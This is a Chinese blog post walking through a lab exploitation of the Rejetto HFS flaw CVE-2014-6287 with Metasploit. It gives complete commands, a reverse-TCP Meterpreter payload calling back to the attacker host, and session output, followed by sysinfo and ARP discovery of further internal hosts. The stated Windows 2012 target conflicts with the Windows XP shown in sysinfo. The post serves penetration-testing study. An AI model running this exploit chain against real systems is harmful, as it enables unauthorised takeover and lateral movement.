版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/l1028386804/article/details/86607498
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86607498
攻击机: Kali 192.168.175.128
靶机: Win2012 R2 192.168.175.130
在上一篇《对威胁建模(附加搭建CVE:2014-6287漏洞环境)》中,我们确定了目标系统的漏洞和Metasploit的可利用模块,接下来我们就真正获取目标的控制权限。
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set RHOST 192.168.175.130
set RPORT 8080
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.175.128
exploit
具体操作如下:
msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOST 192.168.175.130
RHOST => 192.168.175.130
msf5 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
RPORT => 8080
msf5 exploit(windows/http/rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.175.130 yes The target address range or CIDR identifier
RPORT 8080 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.175.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 192.168.175.128:4444
[*] Using URL: http://0.0.0.0:8080/OHqKAjyg9dj9u
[*] Local IP: http://192.168.175.128:8080/OHqKAjyg9dj9u
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /OHqKAjyg9dj9u
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1091) at 2019-01-23 11:32:15 +0800
[!] Tried to delete %TEMP%\OmpsEelxzVs.vbs, unknown result
[*] Server stopped.
meterpreter >
执行完后,我们就获得了目标主机的控制权。
接下来,我们看看内网中有没有其他主机,如下所示:
meterpreter > sysinfo
Computer : LIUYAZHUANG
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
meterpreter > arp
ARP cache
=========
IP address MAC address Interface
---------- ----------- ---------
192.168.175.2 00:50:56:e7:f5:30 2
192.168.175.128 00:0c:29:68:65:5b 2
192.168.175.131 00:0c:29:cf:f6:ac 2
meterpreter >
可以看到内网中有一台192.168.175.131的主机。